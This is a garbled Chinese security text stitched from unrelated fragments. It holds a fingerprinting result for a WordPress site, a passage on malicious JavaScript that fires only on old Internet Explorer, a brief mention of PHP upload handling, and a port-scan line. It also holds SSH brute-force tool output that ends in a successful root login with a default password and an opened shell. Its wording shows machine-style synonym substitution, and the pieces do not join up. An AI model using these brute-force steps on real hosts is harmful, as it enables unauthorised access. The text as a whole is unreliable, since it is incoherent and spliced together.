在目录列表中查找后台,发现存在/admin缝隙剖析:http://www.evilxr.com [200] WordPress[3.9.1], MetaGenerator[WordPress 3.9.1], HTTPServer[Microsoft-IIS/6.0], x-pingback[,http://www.evilxr.com/xmlrpc.php], ASP.NET, UncommonHeaders[x-pingback], HTML5, IP[192.126.119.48], JQuery[1.11.0], Mobile-Website, PHP[5.2.17], X-Powered-By[ASP.NET, PHP/5.2.17], Microsoft-IIS[6.0], Title[Evilxr: Just for fun.] 除了ActiveXObject的初始化操作之外,混杂代码相同也会对用户署理进行监测。
这种查看不同于一般的子字符串搜索。
其特别之处在于,代码会搜索以下两个字符串:“rv:11”以及“MSIE”。
将用户署理的检测成果与旧版别IE阅读器(10.0版别或之前更老的版别)的程序特性进行结合,只要当用户运用真实的阅读器进行网页阅读时,歹意的JavaScript脚本才会进行歹意操作。
可是这种歹意脚本在其他品牌的阅读器(例如Firefox/Chrome/以及其他的阅读器)中却不会起作用,即使这些阅读器与IE阅读器十分的类似。
咱们在表格1中列举了不同用户署理与歹意代码的装备组合以及相互作用状况。
}
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: '' [-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':'' [*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root' [-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root' [*] 192.168.1.104:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor' [*] Command shell session 4 opened (192.168.1.105:54562 -> 192.168.1.104:22) at 2014-08-07 22:55:54 +0800 [+] 192.168.1.104:22 SSH - [3/3] - Success: 'root':'toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-164.el5 #1 *** P Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux ' [*] Scanned 1 of 1 hosts (100% complete) Discovered open port 80/tcp on 42.121.252.58“$_FILES['uploaded']['tmp_name']”, 用于获取文件被上传后在服务端贮存的暂时文件名。